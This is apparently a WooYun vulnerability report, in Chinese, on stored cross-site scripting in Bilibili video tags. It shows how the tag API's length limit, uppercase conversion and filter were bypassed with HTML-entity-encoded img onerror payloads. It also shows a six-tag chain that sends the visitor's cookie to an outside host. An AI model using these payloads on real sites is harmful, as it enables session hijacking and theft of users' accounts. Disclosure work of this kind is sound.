WooYun.org

出现问题的地方是视频下方的标签
任何一个视频最多可以有10个标签显示，且标签开放编辑

测试时发现没有进行转义直接按照html输出到了页面导致标签被浏览器解释

添加标签发现超过20个字符会有提示

但并没有请求发出，所以是前端的限制，直接调用接口（http://www.bilibili.com/api_proxy?app=tag&action=/tags/archive_add）测试确认后端限制60个字符
并且会将所有小写字母替换为大写字母
接口本身虽然也做了一些过滤（比如"<script"之类的）但并不全面

通过测试发现

<img src=""onerror =SOME_JS_CODE>

是有效的（onerror和=之间必须有空格否则接口会403错误）
由于javascript是大小写敏感的，所以直接写入含有小写字母的代码是不可以的
测试发现通过HTML编码可以绕过这一问题
即

<img src=""onerror =alert(0)>

变为

<img src=""onerror =&#97&#108&#101&#114&#116(0)>

（非小写字母没必要编码，节省空间）

但就算这样很明显要想把cookie顺利传到站外，仅仅60个字符是不够的
但不要忘记，我们最多可以添加10个标签，那么在这10个标签中是否可以做到呢
答案是可以的（这不废话吗(-__-)b）
分别执行以下脚本（这里字符串拆分是因为编码后太长了，奇怪的写法都是为了缩短单个标签里的长度）

A='ocumen'
B='t';F=Image
eval('C=d'+A+B)
D=C.cookie
E=new F()
E.src='//WOOYUN.ORG/?'+D

构造标签内容如下，直接使用接口按顺序添加至视频标签

<img src=""onerror =A='&#111&#99&#117&#109&#101&#110'>
<img src=""onerror =B='&#116';F=I&#109&#97&#103&#101>
<img src=""onerror =&#101&#118&#97&#108('C=&#100'+A+B)>
<img src=""onerror =D=C.&#99&#111&#111&#107&#105&#101>
<img src=""onerror ="E=&#110&#101&#119 F()">
<img src=""onerror =E.&#115&#114&#99='//WOOYUN.ORG/?'+D>

像这样添加

6个都添加完后（那个点赞的小手颜色有点浅，我觉得在有些显示器上看不太清，就知道红圈里有6个点赞的小手就好了(-__-)b）